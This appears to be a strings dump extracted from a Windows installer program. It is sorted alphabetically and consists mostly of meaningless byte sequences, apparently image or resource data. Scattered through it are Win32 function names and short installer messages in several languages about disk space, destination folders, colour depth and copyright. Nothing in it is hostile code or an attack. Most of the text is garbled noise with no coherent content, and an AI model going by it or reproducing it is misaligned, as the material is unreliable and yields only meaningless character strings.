 CS`]r
cSvWHvSE{ZK}\I
cS{YI|[H
CSZ8KRLac[pn
[ct&*<
[ct&+:
CT{BQqCToF[vgz
CT{DQqCToEZugz
cteur  de disque 
c]tIFsC?q>;zB7
CT{JYyH[vVk
[^c>>>TRQ
CU`,9G%1=&0:)2<.2=,-7)(12/8?<E@=F
cu|gt|at|jy
 cU[j_i4'/5'+siimci;08H;9
!cU[j_i4'/6(,tjjmci;08I<:
cU}[NwXI{YI
 C"(U#)T
cutaprgz}
cutaprh{~
 C"(U#*U
cUzXKnRGnSEpVFv\L}^O
cUzXKnSEnSEpVFu[K}^O
cv{hu}at|jy
cVNgXOzi`
C:\VP-EYE
_cvZ`sJPcCI`AG^-2KEKbtx
!*<?CV]ZU\Yw
"+<?CV]ZU\Yw
cwr(C9&F;2PE[qe
_c{]_w[^sZ[pWWoQTiVZrY^w\c~Xa|Ze
c^}\WwXTwc_
CWXDQD<RF<TJ@[LCbOGjXMueU
cX{cW{^WrVKhE;iE;w[P
c:+x[LwdWJA8#
_c{^`x[^sY\qWWoRUjVZrY^w^b~Za|\d
c]xTJySG
CY} %.-&#4/00..0..2/1/+0*(.657
cyberl10s
C-yB-{F1
<cy;e|Bn
C)yE*vfR
`) c//yFNn<FyGS
$c{#Ym ^u \a
"/@CYqqb~
C:y),r
c?y`@xa?w`7oZ0gT+aP']L%\K
'!")#(+'-?=CYX\LS\HO`\_tPQfX[pJQjT\s\buf`kxe`
;CZ5<WGJfaayro
C=Z6.T3*V5,X8-\</fE6kI9}TE
.Cz%7l .c
/Cz&8m .c
cznik u
c\|_ZxaYqWP^KC_H@kRHtWN{^U
Czy chcesz zainstalowa
Czytaj to
D0H0L0PM
d0)k=5
d0)l>6
 D'1OQZuv
 D&1OR[vv
D1T9/^E;|^S
D/^2%g1&|?1
D2=]gp
d2	Y-	O)
d- ^4(d@6a6']4%c>0c>0]D:TH>SK>VQB\YK_XIcV@dV:jW<i^Hc]FeU>aS=]K:\E6ZB6Y=6kDB
d- ^4(d@6a6']4%c>0]D:TH>SK>VQB\YK_XIcV@dV:jW<i^Hc]FeU>aS=]K:\E6ZB6Y=6kDB
D/[4+i@7zPC
`d}4?[*<Y+:T?Ia^g
)D$5P2F_/E^)AY2LdE\v@Wq<Ql8LeN`wr
&> )D.5P<E`@H_>C\<D[@Gb@GbBMaCOgOVqRYrW^w]e|bj
D5V4'oPA}V@
D5y (u
D6i,"p2*{=5t90m4+t;2o6-l4)m3-u:8u=8}CD
D6i,"q3+{=7s8/l3*r;4o6-k2)l2,w99u=8~ED
)D#6Q3G`.F^'AY2KeE\v@Wq<Ql8LeN`wt
_D6rO;
D={7/u,$p$
^D8bB7pI;
d@8pF9{I7
D$8RhhMK
D$8RSh<
D.)9' $
D.)9' #
/,d>9U=7W=6^@;`C<hKBsQD{VH
DA-6D69-472e-8981-DBC71
@>D::@_[a99?228SU]|~
@>D::@][a99?228SU]|~
D-%=*#A-"F3&I0 M*
daj...
daj CD...
@.data
 Dateien,
Datei kopieren nach : 
+D,AW2Gb5Jf3KcF\xr
+D,AW2Gb6Kg2JbG\xt
D+!B(!A$
D{bBy`Aw`;p\=p\6hV3eS5eS4dR/`P/`P,`O+_N)]L&YK UG
D/}>*}@,{@,|B,{D/
D/|=)}@,{@,}B.{E.
D{bEybDxa<r[:o[5jV1eS1bR0aQ/`P/`P/`P,]O)ZL#TF!RD
DbmIdr9Yd=`j>akGiv@cm1U]3T]:Ze>`fCciB_f=Y`Iag
=dbPYGH[LJ\JI_KJkUWmbZ
dbq sb
d`}b^v\VqWQfLFI
d`}b^v\VqWQfLFJ~fDzcAw`<r[;nZ9iW8hV:fY5aT6aV6aV6dX5eY6gY5cV-[N
d`}b^v\VrXRfLFJ~gJ~gDzcAw`<r[;nZ9iW8hV:fY5aT6aV6dX5eY6gY5cV-[N
%-+=DBX^p
dc|`]}dW{cYxcTr_To_Ul^TfURdSL\JL]HE[IA[M?\MC]OO`RP\HN^GHXFBM=37+53)lZY
dc|`]}dY{cYxcTr_To_Sl^SfUQcRL\JK\GF\J@ZL?\MC]ON_QP\HN^GGWECM=48,64*kYX
d`cGF\@?Y8<^75g84
dcs`\oTPcNM]FKZHO^GR`BO_8BS/;M.<N/?P3CT0>P4@R:GW5CU4CV+9O#1D(5E=DWCF[B@VICZ
dcs`\oTPcNM]FKZIP_GQbBO_8BS0<N.<N/?P3CT0>P4@R:GW5CU4CV,:P#1D*4E=DWCGZB@VHB[
$+*=DCY_q
D;>D;>5#
dD7tO;
+++DDDEEE$$$
Ddk h$
]d|]dr\akV^gVajT`s[cx]a~V[
]d}:DU*6@+6:,6=,9;,9;+79)68(57*68(46*36)59)68-99+77)55)76+8:.;=-69)25+47*36/8;.7:+47'35(46'35(46(46)57)57)57'35*36*36+47+47,58-69/69/69*14'11*530562=A=Z^j
]d}:DU*6@,7;,6=,9;-:<*79)68'46)57(46*36(48)68.::*75)55)76+8:/<>-69)25+47*36/8;.7:+47'35(46'35(46(46(46)57)57(46)25'35)57)57,66-69-69/69*14'11*530562=A>[_j
DDV87KNL`pn
dd}[\xW^}YeyTdqL`mG]fBXc?P[2A`5>f:@uIJ
dd|YjoPmaEyW?}V@
dd|Z[xV]|XdyTdrMamG]eAWd>P[2A`5>f;>uIJ
 !! "$#%`de
)]"+d'.e(2h&1e#0d"0d$2f.=n:Jy@O}<Lw8Fp7Dj5Cg>JlHTvR^
d,'e53
 debe ser por lo menos 32k colores para efectuar este programa
default
defaultfile
DefWindowProcA
DeleteDC
DeleteFileA
DeleteObject
deoblv[hp`ks~
Der Monitor mu* mindstens 32k Farben eingestellt werden, um das Programm auszuf
 d'espace  demand
Destina
Destination
DestroyWindow
%*(?DEW`d
(D/fc_oL
)D.Fd;[
)D,Fd:Z~Ki
]`dFEG>;=E@AGCBHC@KDAHDCHFFCCCcef
:?@DFG
DFi:>aEHg
:`dGOC9TD=ZG@ZKBeNFk[KzbV
dgzdfydfydf~ge
_d]$h]
DH{AGv=EmAInSWznp
DH{AGv?EnCInSWznp
D  H! H
D$ h`IA
DHIBEC
DHICFD
D%$I/5F5BH=ME8N>+><&9<(;C1BJ9GQ@MO>IU=I^KZdP]_IU^KZYBPqLV
D%$I/5F5BH<NG7N<,>:&9<(;C1BJ9GP?LO>IU=I]JYdP]_IU^K\ZCQqLV
DialogBoxParamA
Die Position des Verzeichnisses f
Die Selektion der Programmierumgebung
Dieses Programm ist durch Bestimmung internationaler Vertr
<DiHPusz
<DiIQvsz
  d''image
dir_count
Directorio
disk_count
disk%d
disk%d_group%d
Disk Drive:
Disk space is too small to install.
Disk space is too small to install. Do you want to continue?
DispatchMessageA
divVigHc_<|U5
.D'@J30)
)D?J`lv
DJO2<<Xbb
DJo,4\,6e/;k1<p1<p/;k2=i6>m4:o2>n4Br9Eu0<l1;j6@o;EtJR
DJ]TXpvv
djw\^fUNQygf
djw\^fUNQzhg
D),K6>E5@B0=@.;I8CL;FC2=A-9G4=UCJVEIL9BB29I7>M8AG2;dDI
D[kDZlG_wG_wI^yH]xQd
D[kDZlG_wI_xI_xH]xRe
dkn_fibilfjkppp
dkn_fi`ileijppp
dLbE@]B8_H9eI>lI;nC.k@+sH9vTDoH:oH:mJ<nYJfXLbVL`VLbYOb_QibSleTvkWzcMwXA}YImSBvL9qF3gD7iFCiOOrZ\
D$lBRhL
.!(;DLc_g~v}
dLdJ>bE@]B8_H9eI>lI;nC.k@+sH9vTDoH:mJ<nYJfXLbVL`VLbYOb_QibSleTvkWzcMwXA}YImSBvL9qF3gD7iFCiOOrZ\
dLdJ>bE@]B8_H9eI>mJ<mD.j?*tI8wUEmH:lI;nXLfWNcWM`VLbYOd^QibSkdSvkWzdKwXA}YIlTBvL9rD2gD7iFCiOOs[]
D$ `LK
dlkQX[
;DM*1:24<KIO`Y`D>C<6;7243,13,193882764:/2725=46>:CLdt
;DM*2925:KIO`Y`D>C=6;8143,13,1:38827659/2725=36>:CLcs
d) m6)
dmqHTZ>IQ@IRFPWFPWGNWFKTGISBCMCBL87A
dmvepx[jsWgses
dM\WBXQ>WO@\`PreVvM8XO5SQ:ZeTueWspc}xi
dmzeq}iu
dmz]iuamylu
d>}N3R3*hQU|bh
d>}N3R3*iRVzbj
dnngnqckjcihionhnmx~}
dnnkpqholhmkqtrorpsvtz}{twunomqqqqqqooomoonppkpolqpino`imYcjU\eXbl
dny tryb co najmniej 32K kolor
d>~O3T5,kVU}ci
d>~O3T5,mUU}ci
d>~O4S4+jSW{ag
d>~O4S4+jSX{ag
Docelowy katalog dla instalacji
Does not support this operating system.
dolO^rVcqV`nS]
DOMAIN error
domkqpkqlknlosnptopqmpqmpqmpqoqrppqoqqqqqqqqqmoolnnimnejmaglW_fXck
domkqplrmknlosnptoosnqrnpqmqrpqrppqorrrqqqqqqlnnlnnjnoejmaglX`gXbl
.d%;o%;o
DOoBLnHQs^e
DOoBMmGQs^e
DOS mode.
 do uruchomienia programu jest niezb
do}Xbsdmzps{
do}Xbsdmzqt|
Do you want to install device driver
\D|P3yF&u=$n6#e0#d1!e0#f3#mA0pM@rHAkB@lKOjPPpXZmYXnZYqY[r]\pXZnVVpRMuNLvSP|^YzXRrMEnIEfGFlKHlOKoQPpPQrSTnNOmMNrNTyWX
D$<Ph@
DPh5AY3?W8BZLXpdp
DPh5AY4@X8CYLXpdp
DPlLWsoz
D$PP6@
DPr;Im9Ei?IkHQrIRsVa}ISq;DeFOqFOqENpFOq>GhBLnEOqEOqJVxFRvIUyV_
DPr;Im9Ei?JjHQrHQrVa|ITp;DeFOqFOqDMoENo>GhCNnEPpEOqKWyGSwKTyW`
dpt^lrhx
D$pWPh
dpz^hrajsR^hSamamyepxT\c9?D^gk|
dpz^hrajsS_iSamamyepxS[b9?D^gk|
DQ}FRvFSsETtDUoP^t\m
dQIf\U|nh
dQJfPErXL
dQJnSIuSF
Dq~>kxBs}Fw
dqsDPTAMQBNR@LNAJNBHO@ENCEPJJXQUhZh
DQSEQQDPRCMTALTBMUALT;EL5?F9AH7=D77=IMNuz{
dqsfrxmw
#$")D:'qY
dqyzNT
DrawTextA
[drbhujjv`bjeafeXV{f^
[drbhujjv`bjfbgeXV{f^
 Drive disco:
 Driver 
dr~`p|]ozSdmYblLTaO]iKU_HS[GRZAJS9BK7@I/;A0<B6BD8DF4@B4=@6?B6?B9AA;CC9EI@]fc
dr~`p|]ozSdmYblLU_P^jKV^HS[FQY@LR9DL6AI/:B/:B6BD8DF4@B4=@6?B5>A9AA;CC8GJ@]fb
dRQ_VRaUU`PQVNNRMLUOP[VXZSVd[^cY_
dRQ_VR`TT`PQVNORLMUOP\UX]TWd\]cX`
dr~XhnSdgQdaFRL16-NK=o`P
)D:(rZ
dr~ZhnTehQdaCQK16-NK=o`P
d[rZNf]IU
{ds|ae
]dsDHZFFTCBRA?RB>Q?9J95A0/902:-12CHK
_`d???SQQ
DSsN\xFZsct
DSUVWh
dS{ZKwVGzYJzYJ
dS{ZKxWHzYJzYJ
DT`,9G%1=&0:)2<.3<+,6*)2006?=C?=C
 DTa]r
DTC:O=6P=:UA<ZCAfNHrVU
dT~\L{ZJwVGzYJ~YK
dT~\L{ZJxWHzYJ|YK
dTMdQIvbW
D$TSPh
dTvS?vR@
d_t_YpZTkhbyup
d_t_YpZTkhbyvq
d{u3Vk
dU5 B~
DUb$6A:FP*;D5HPCT]l~
d^uKFrB>r?<zB7
DUpM^yEWtNc
dU{^PtVKz_Qy]R
\duZesdm{bkyafuZ]lT]gQYfS[hFR\APY@QZDS\ANVCNV@LRDNUDLS5>G:CL7@I7@I3<E.:@1=C3?C0<>0<>1=?1=?3<?3<?3<?3==/;;3==5??:CFBX^]
\duZesen|bkyafuY\kT]gQYfS[hEQ[APY@QZDS\ANVCOU@LRDNUEMT4>E9EK8BI7BJ3?E/;A0<B3?C0<>0<>0<>1=?3<?3<?3<?3==/;;4>>5??:CFAW]]
&=,=D=v=
DVa$6A8GP(;B6GPCT]j~
dV}cS}bT
|dv~dvy_oqZhs]ioX`XAFX?CD),J.-J.-J.-L22N36T56O109
dV}_NuXJzYJ
dV}_NvYJzYI
dVp]NiVGkxLO
dV{]RtVKz_Qy]R
D$,VUSj
dVw]LrXJoXHw]O~dX
dV}XJyUEvRB
dV~YKyUEvRB
dVzbV{^WrVKhE;gD:w[P
dVzXKnRGnSEpVFu[K}^O
DWA6fL@
dWOvb]
dWOxb]
dW~^Q}]P
dW|_Q}]P
dW|_Q|_Q
_d|\]w\_uQWqRYtR\
>"dxa_s\`sZbu\cs\cnT_fKZaLUUCIM:IN?ISCGQAGSAGZID[LCZLJ]LP`NO_MHTBDG7:5&7-#O=<jUX
? dxa_s\`sZbu\cs\cnT_fKZaLUUCIM:IN?ISCGQAGSAGZID[LCZLJ]LP`NO_MHTBDG7:5&7-#O=<jUX
>"dxa_s\`sZbu\cs\cnT`gLZbKTTBIM:IN?ISCGQAGSAFYHD[LCZLJ]LP`NQ_MHTBDG7:5&7-#O=<jUX
dXRk^V}jb
,_D([@)X>&S8#N3
dxs(C9&F;2PE[qe
d[x_UoRKeH?eH?nPE
d_~]XwYVvc_
d>,|Y?
d`}[[yBDbGJfjm
D~yE2%O4*`C4}VH
 dysk#
DYu9KhGWt^l
_d|\]y]]uQWpQXsRY
dY}`Wu\Rx]Sx[TX
dY}`Wu\Rx]Sz[Rn
_d~[_yX_
=dz;e|Bn
dzenia
dzie instalowane oprogramowanie.
DZv3JdF[wZo
_d~[_zY`
dzynarodowym prawem.
d>,zZ=
+E!0J^l
+E!0J_m
-e 1j#2p(7v*:|->
.E 1K!2L
E<^>1VB7T;1U<(Y@,hH5oN;{YB
<.&E2)J.%F-&A0(?:1K?:UCB\A@`>;b;6c;7h>>nACsGFx@?q,+W.+X>;i<:h30b30bYV
E32ZJKhWZ
`e`-4-
E4aC8nL?{C8
[-"e5)xD7
E@}60kUL~ig
E7{(-y
E7Y8/:+">+#;+%=-'D3*S;5XD9eH:vSE
E8J8O8[8`8i8o8z8
e8+wOCM0''
e8+wPBO1&'
_e`97g=8tE=
_e`97g=8tE=~J>
}~|E=>:()>+(9$"?*(;*',FV'EV3Q\@_b[tj
E.|@(}A+
-%|E<a=7\>9C3,I8/L;2WA6\K>nYJ
E=~A9z<3v8/t6*v7.y;3}A8
]`eaagfjkrttz{yywvupotmjvrmxupuqpsqpbddMOO
E.&>+$A,$F3&I0 N+
EAgC=U:6[=8YA;`D=lKBsPFxUG
EalHes9Yd;_i>akGiv@cm1U]4U^8[e>`fCciB`e=Y`Iag
E,}A+o5"p5%o7&q7$s@,|Q>
E,}A+o5"p5%r7'q7$s@,|R?
EaQKrb[
E$~A!x7
eaXVVURNC;4=5.H<6[I>WG:iSGv^R
ea~[[yBDbFIekn
eazVQlb^{^\z\\zpr
eaz[XqQPjRSmhl
E?~B<{>7v81s2+p.&r0)s3,x:3}A:
eB|cAyb>va8p[2fU(\K$ZI$\I"YF'XJ$KC
=E"BG%@D8MN
\E=bH<mK>}ZL
E-|B/v@)m8#p=)~I4
+E$B[>]vOn
ebx\YrPOiRSmjk
E)"C6(N<5dSJ|cY
eC|cAyb=w_9r]8n]-`R(]O%_M$[L!VH
e@}cEzaAt^Bu[Cx_Eu`AwaEw_C
"&:ECFTPYgc
EC`HJR>LF5H?1DG8M\9N]3:=(/ -< 4A'@I455'+
<@ECHKPY]`jqhryhryqy
EC;JH@VWNhigsonuop
E[~CV{AUx;Mj&4K
eCw_AybBt]Ct]Cw_Cu_Cu^Dt^Eu^D
ecy`bz`d
e+%|D>
[E:^D8jM?{YI
EDH'$&302UPO_ZWYTQRNMOJKKIIedf
EDH'$&502UPO_ZWYTQRNMOJKKIIedf
E/~D.y@*|C*
E/~D.zA+|B,
E+|E0tA-p>'xE+~E/
E+|E0tA-p>'yF,~E/
[<EE&-bGP
"EEHglo
"EEHgmp
%*(=EEU`d
E*&F+';
E+%F+'<
 :"&E*'F)&E$&E*&F-'J0%J0$I/$J.&I.(I.%H-%H-'H-&G,%F+$E*#D)#D)%D)#@&"?%$>&%=%$<$%;"%:!#9!!1
efj?ABPPP
efpblv[hp_jr~
%EFQqS^~LVxJTvak
efwRVbGKdELmKRjMVmKQrRWsQXyW]|\]
[>/eF/xU;
E+%G3.D1,B.)C0-H31I0,F*#H+$N2+F+!C-!B(!E.&J3+L5-L2,B(!D.#N1*O6,O8)J/!J1'B0)F3.E3,C6(B7)K4$Q0!M/$Q4+N.)M25E34C26?1<A1CC/FG6KO>SO6PT>ZMB\Q;XMDeJNqIRtGPrIRtOSvSRrXOjeUljZqpaviViRBYN>UTBYUE]\FbO=TI:ORBSZHOWFQY:A];AeDKkGShJWdISbJTaJX\BO[GT^Q_dZfbXdh[itboqcoxbg}aa
eG{bH>
EGe/7U0=]@KkU[xdg
EGe/7U0=]@KkUZydf
E=G/)N91`H<cJ:aE4kJ6sO7
eGybH>
E.H1)S<4nQC
<EH7?>t}z
<EH7?>u~{
E,"H-#F:0>6/;4162-<0.@40G5.G,"F)"C% C#
E,"H-#F:0>6/;4162-<0.A51G5.F+!F)"C% D$
E,"H-#F:0>6/;418-):-+?40D>3@F5;cJ.
E,"H-#G70>6/:3062-;/-@40G5.F+!F)"C% E#
E$!H)*I04N7<W@EU?DQ;@P<AO9>M8;W@DT>@N8:L59J7:G6:Q<?
%(EHL|
ehm;7=>58=56@35@574DT4EX3GY6J\3GX4HY3GY5L\6J[3CS/?L.@K5MYCbkSn|Vdz@Ka3AT3BR2?M1AN2AQ1@P4CS4;J67A55;47;29<0::1><1@</@<.B=/DB.CA,?D(;@);B);B&6<'69&35%13(22,66+47'03%13%11)33-77)57*36*36+47(46'35)25*36&00%//&00'//(/2*22(22/:8*59+473891=?;PRRxz{
ehm;7=?69=56@35?465DT4EX3GY6J\3GX5IZ2FX5L\6J[3CS/?L.@K5MYCbkSn|Ucy@Ka3AT2AQ2?M1AN2AQ1@P4CS4;J67A55;36:29<1;;2?=1@<.?;.B=/DB.CA,?D(;@);B);B&6<&4:&35%13(22,66+47'03'03&00(22,66(46)25)25+47(46'35)25*36&/2$-0'.1'.1(/2*22*22198+6:+473891=?9PRRxzz
EHP.15*-1+*3,)22-61*14.34/1:56>9:
EHP3<?]fi
EHP5<?]fi
E}h?t`=nZAm\CgY3QF
EIe6@^5BbALlKSqX\x[`yFSm<Ge?IgCNjGRnDMn=Fg>Hf5Bb2?_=Jj<Ii=Ik=Ik>GlENsHQvLTyU\
EIe8@^7BbALlKSqX\x[_{GTn<Ge>HfDOkFRnBMm=Fg>Hf6Da2@]=Jj<Ii=Ik=Ik=ImFOtIRwKTyT[
%(EIJ}
 e installato correttamente sul disco rigido.
Ein Werkzeug f
ejhS=2P;3U?3\@9\E=gMArRE
*E?J`lv
E]KDpaX
 #(EKJENKgro
"'EKJENKgro
EKp+3[,6e/;k1<p2=q1;j3>j6>m5;p2>n4Br7Eu0=k1;j6@o;EtJR
@\eKRH>UI?UJB[MGbSJlZOzdX
(E~.K~;Y
=EL2;?\ff
?EL4:?]gg
El directorio de destino para instalaci
(+"ELE
elenco delle directory 
El espacio del disco es demasiado pequeno para instalar.
[elLUYV]`_dg07:)18%*3^[{^Yya[~ZVy\Uz_V~a[
els&9N
El Trayecto no se encuentra.
;Em3<g+5d0:i(5c,9g,8h
EM4Z_Cim9_d0W_6aj;hsD}
em~ak|cm
eMbJ>`F@]B8_H9eI>lI;nC.k@+sH9vTDoH:mJ<nYJfXLbVL`VLbYOb_QibSleTvkWzcMwXA}YImSBvL9qF3gD7iFCiOOrZ\
E%#M&%O((P#$J"
en~cl~ly
EndDialog
EndPaint
~enkLXX
enkLYW
ENs &3)11KRU;BE:?@3:=5;:586355.34-23.23
ENs &3)11KRU;BE:?@3:=5;:586355.66,/3/34
 , en total de 
<EO)0903;21:A=C<?D24<57?7;@02:02:25=25=03;.4936:,4;7AHYcmp
;EO)0914<52;A=C<?D43<68@8;@21:13;25=25=14<04936:,4;7AHYcmp
eO~K7Y$
eooforaljbjiipmholx
eookpqholhmkqupnrmswrz}{vwunnnqqqpppooomoooqqlqpkophmn`imYcjU\eXbl
eOyA.m9)m<.i</`9+g=0jC5kD5lC4g>/e:+e<-d<*b7(\0#U+
eOyA.m9)m<.i</b8+g=0kA4lC4lC4g>/c:+d;,c;)b7(Z0#U+
ep1'*"/
eParam$
ePHoWKuWL
ep~R[iJSaJWeaizls
ep~R[iKTbNYgaizls
EQ{BPzFMxCOyAQ
EQ,`g=qw4eo,]g)Vc*Sb*eo'dn)fp8z
Eq?iyJqm@eT(K4
eqskxzo|~r
eqsmy{p}
&`?Er17\',K
ER~BO{BPzENyEQy@S
ER~FRvFSsETtEVpO`u\l
er  groupe :
_erIMX5?F/:>-9=/;?-:<-9=,8<+8:+8:+8:-:<.;=1>@.;=*79+8:,9;,9;+79,8:-69/;=0<>/8;-69-69,58,58,58-77,66-69,581;;/:8.97198.66/762;83;:6;<5==7JMFmuw
_erIMX5?F/:>-9=/;?.;=-9=,8<,8<+8:+8:,9;/<>1>@.;=*79*79,9;,9;+79,8:-69.;=0<>/8;-69-69,58,58,58-69,66-69,581;;/:8.97/:8.66/762;83;:7<=6=@7JMGnvw
eRJ`H<oOB~ZJ
ertKY_GW^EU\FV]GW^JZaO_fP`gUelYip\mv^p{Zny[mxUgrQaqN_lJ[hFTfKVdS[h]`omoz
ertTba[ihesrl}ziwsp{x
ertTba[ihesro}{iwsq|y
eRuTAwSA
eRuT@wSA
Escolha o Diret
ES}CQ{CRyFRzCU~BY
es das opera
es de Instala
es deste programa e estes documentos s
es do ambiente
ES}DR|CRyFRzCU~BY
ES}DSzDTyFQwFRzHX
Esht*6
E@sJp(P~
 es mindestens 32k Farbe sein, um das Programm zu bedienen
ESoL]xEWtNc
Espace libre du disque :
Espacio de disco disponible:
Espacio Total requerido:
Espaco livre do disco:
__e???SQQ
 Esta propiamente instalado en su unidad de disco.
Este programa 
Este software esta protegido por el tratado internacional.
 est install
_ES?.V9*\8._8/bB5`6*Z6,Z>3R@5R@9J>8E<3HD9QL=XH7_G5^J9a^I^N7bJ2\J3]O3WP/XM/YA)Z<+\9/sLC
ESY_mss
.et8l|;r
.et9m};r
Etapa anterior
Etapa posterior
Etape d'avant
Etape prochaine
|et~dty_ot[is^gpYaXAFW>BC(+J.-J.-J.-L22N36T56O109
ET{JYyH[vVk
Etl>3+G4-D8.E5/N>7aXKdQIn\Q~dV
eU~dT}cS~cU
eU}[K{ZJxWHzYJ|YK
Eusi`chZZZ
eU{XJyUEvRB
E\v,B^5JfDVsGWt;Fd[c
E\v,C]5JfDVsGWt;Fd[c
eViRJgMFfMCnXL
e`{VQlb^{^\z]]{pr
eVvbWg
eVv`UW
>Ew8As@G~EH
E\W@.'G.$A8/G>1TB;]MAnXM~e[
E[wG]y_s
e|~Wnpdw|aqwl|
[ewQ[lPYmOZnMXlDOc9GY2AQ&6F$4D .@
ew{`tq^sp^uj[pr^qpZloSfqVjt[opVhq]pn]rh\xn^
ew{`tr_tp^uj[pr^qoYkpTgqVjt[oqWiq]pn]rh\xn^
eX}aVtZSq[PmTJ
E}xC|yM
ExecuUA
eXf^O][LZbN[\BOYAM\HT^:F\9CY:=^EAZFAW@DZEMS>FV;DS;GP?HF;>B8>K<DQ:BT6;T9=T>CR;@Q<?O@DVIQ\QYWQVTJPPIPWLNRDEUGIUGHPEARDEJCJGFPOKWSPYZQTZKI]KLaPTdP\eMYZJUhTadO^_N\dXd\NYVKUo`ds^`P;9C#
ExitProcess
Expor.exe
eX|_Q{^P
EXQ@UH@NB<TH>[K?ePHsbY
eX~^S}VMwMFvOG{QJ}TQ
E~{$xt1
=+*E,(YA;nTN
eY}bX~cY~h\
eY~cY~cY~h\
E/y>*|C.yD/zI3wN5wU=yZAsO7rH1|N6
e^yd\|`U
e]~YeqMzmM
=+*E,*Y@<pTM
e_~^Yygc
]ez]fr\akV^gV_jU^rZbx]`~V[
EZuCToFWr>Li
EZv:LiEWt]k
eZ}VMmNE`J?`IAjMDnRG
eZ|WnlMvcH
eZ|XNmNEcIB`IAkNGnQH
&+.$F@
F0V;1fLF|ZT
]/(f?0xN7
F0yC,|C-
F1]:0`=0nG8
+f&1m'2l'5j%3h!/` ._*8h<GsGQyR]
F,&2+";1*J?7_GAiNDoM@wSC
</'F2)J/'F.'B0(?:1K@;VBA[?A`>;b<7d96g==mACsHGyA@r*+W.+X>;i=:h4/b3/cXV
F3^E;fMC|YO
,F#3J_m
&f(3q-<{(>
&f(3q/;{(>
F??3@YAXP
f<5t@3
	F5,WH?~fZ
"(#%F8 sZ
+f&8u*<{+>
f95qNJS:8$
.f"9q!:r
F-|@(}A+
FA~60iTK~ig
\F@aF<rRG
fa}optqzihqb\ae`apjk{st
fa}opusyihqb\ae`aoij{st
Favor de dar entrada al directorio que desea guardar este programa.
Favor de dar entrada al nombre que quiere especificar este programa.
Favor de insetar el disco#
Favor digitar o diret
Favor digitar o nome que queiras especificar este programa
Favor inserir disco#
F%~A!x7
f`aXRSOGGG;9<1-:*$?+&>!
F,{B){?)}A+wA*s=&{A+~@(z:"|:!{8
fB|cAyb=w_8q\8n].aS*]O%_M%\M"WI
>F"BG%@D8MN
fb{MF[kcz}w
FbmJfq9Yd=`j>akGivBbm1U]1U[:Ze@`fCciB_f<X_Iag
fb{NF]kcz|v
/f!Bu7
fbuRXkBMa7EX4DU:I\9G]7E[2@V,9O/=P(7J!2G*1BRWlns
F,|B/x?)m8#p=)~I4
}FC|EB|EB{DAzC@zC@zC@yDA{D?{D?{D?}F?
FCS4.A&
FCS6.?&
F,|C*}>)|@*y@*s=&{A+}?'{;#|:!{8
f+D?	D
;FdFVs?Ol/<\@Nk^j
F}dFzc@v_?u^:o[7lX5gU5dT/`P*^M*^M,`O+\N)WJ&TG QA
FD<JGBUUOijhsonuop
 !! "$#%`fe
F'#e?:
\F;_E9mM@}[K
"'>FEDOLguq
fE{d?u^>s_9m[7hX0aQ-aP*^M(YK&WG&UE"QA#RB M=
fE{d?u^>s_9m[7hX0aQ-aP*^M(YK(YK&WG&UE"QA#RB M=
fE{d@v_>s_9m[7hX0aQ-`R*]O(YK&WG&UE#SA%RA M=
fE~eC|c<v^;s\=r^;m[7iW8eU4bU3dV1cW0aS-^P+\N$WI
!&>FEEPMguq
feiGCHC=Bhbc
FEmTRpXUoYWtXUuYXrYYqWXmPZl<Li!9g"6p/6a%#)%"
F<eRKfZT}mg
Fertig
Feuilleter...
feu^\oPNaCCU6:L07H-7H-:J-7H-:J-=M+>M+>M*9I'4D0=M1?Q0@P0=S(3I&0B*1D17J89M@=V|{
feu^\oPNaCCU6:L/7H.8I.;K-7H,9I-=M+>M+>M*9I'4D0=M1?Q1AQ0=S(3I'1C+2E17J9:N@=V}|
FezMh|Igz>]v6Wq6Xp8ZqBaz=]t2QfH|dFzb@v_;p\:o[8jX3gU2fT1bR2`S2`S1bT.aS(]O$YK
FezMh|Igz>]v6Wq6Xp8ZqBaz=]t2QfH|dH|dE|c?w`9q\:o[8jX2gS2fU3bR2`S1bT.aS(]O$YK
FezMh|Igz>]v6Wq6Xp8ZqBaz=]t2QfH|dH|dFzb@v_;p\:o[8jX3gU2fT1bR2`S1bT.aS(]O$YK
FezNi}If{?^w6Wq3Wo8ZqAc{=]t2QfH|dH|dFzb@v_;p\:o[8jX3gU2fT1bR2`S1bT.aS(]O$YK
F;f;2O2+O5.S6/^A3pO@
fff000+++nnn
FFtFFt>>n;;k74f2.b2/`42`3.[1+Z/*]-(_4.c74e00`0-Z/,Y/-[4._41_34`22`62f86j:9k<<r@BxGI
fftRVaDEOA<E77=6272+08-0:,-=,)B/'A-"E/#H3$V;-a>0_9'a:$e9"{K3|J3s@&{C*}E(
ffxSUgLPbSWi\_nWWgUUcSUgPRdLL^QP`
ffxSUgLQ`SXg\_nWWgUTdSUgQSeLL\QP`
F# G$!H 
:FH6BBm{y
F%"H)*I13O8=W@EU?DQ;@O;@O9>N9<XAEU?AN8:K48I5:G6:Q<?
f$	h%	l(
@)-\FHqah
fhzYdzVc}Uf
fI|9 t9%i7%U#
fI|9 u:&i7%U#
 fichier,
@Fi $GKMoy{
file_count
file%d
file_dest%d
file%d_name
 files,
file_src%d
FillRect
Finalizar
FindClose
FindFirstFileA
FindNextFileA
Finish
>F{?Iy@Hw<Ds:@m8?f=CfTYx\`|\c~^d{`d|`c
;FJ5ACiwv
FJg:Db/:V$0H"-C .E$4K(6M(5K0;Q0:R3?W1<W0:R<AZ8BZ5@[6C]6C]ALgCNjBMiGRp<KkAMoLVxSV|ab
 #',FJO`bbbfapsq
F)%K20C*(A&"=
F)%K20C*(A&";
fKW5(Y;0`<2Y4&Z=.P=0NC5LE6J>2E?4JA4TH6YC1_K:ZRAYK9[[KS]MQ]QNZNM[OQ]QW[OXUGR<0O'"`<6|US
fKX:/`<2Y4&Z=.P=0NC5LE6J>2E?4JA4JA4TH6YC1_K:ZRAYK9[[KS]MQ]QNZNM[OQ]QW[OXUGR<0O'"`<6|US
fKX5'X:/^;1W4&X>.P=0QD6LE6J>2E?4JA4TH6ZD2_K:ZRAYK9\YJS]MQ]QNZNM[OQ]QW[OWTFR<0P)!a=7|US
fKX5'X:/`<2Y4&Z=.P=0NC5LE6J>2E?4JA4TH6YC1_K:ZRAYK9[[KS]MQ]QNZNM[OQ]QW[OXUGR<0O'"`<6|US
;Fl.7\9;^GEc]Zsxt
f^LESD;]K@qZK
fl~guyitwgr~mx
);FL\h
fliT\UFZSD^[FztW
 #(FLKKTQjur
 #(FLKLURjur
flkQX[
F/>lm~
- floating point not loaded
flwcpxs
?Fm'2^%3c/;k0;m/<p/:l1=m1;j18i29k07h/9i;Eu:Dt4=o9Dv>I{LU
